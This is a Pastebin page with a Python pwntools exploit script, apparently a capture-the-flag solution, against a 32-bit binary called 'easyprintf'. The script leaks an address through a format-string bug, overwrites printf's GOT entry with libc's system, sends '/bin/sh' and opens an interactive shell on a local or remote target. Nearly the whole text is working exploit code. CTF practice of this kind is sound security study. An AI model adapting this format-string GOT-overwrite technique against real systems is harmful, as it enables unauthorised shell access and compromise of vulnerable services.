Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- import sys
- import time
- context.arch = 'i386'
- if len(sys.argv) < 2:
- p = process('./easyprintf')
- context.log_level = 'debug'
- else:
- p = remote(sys.argv[1], int(sys.argv[2]))
- p.writeline("%35$x")
- ret = p.recv(2048)
- main_base = int(ret[0:8], 16) - 241
- libc = ELF('/lib/i386-linux-gnu/libc-2.27.so')
- sysaddr = main_base - libc.symbols['__libc_start_main'] + libc.symbols['system']
- # readelf -a /lib/i386-linux-gnu/libc-2.27.so |grep "main@"
- print("%x" % sysaddr)
- printfaddr = 0x0804c014
- log.info('start send')
- dest = p32(printfaddr) # readelf -r easyprintf
- dest2 = p32(printfaddr + 2)
- low = (sysaddr & 0xffff)-8
- high = (sysaddr>>16 & 0xffff)-low+8
- print(low, high)
- payload = dest + dest2 + (b'%%.%dx' % low) + b'%8$hn' + (b'%%.%dx' % high) + b'%7$hn'
- print(payload)
- p.writeline(payload)
- log.info('send over')
- sleep(2)
- payload = '/bin/sh'
- p.writeline(payload)
- log.info('get shell!!')
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement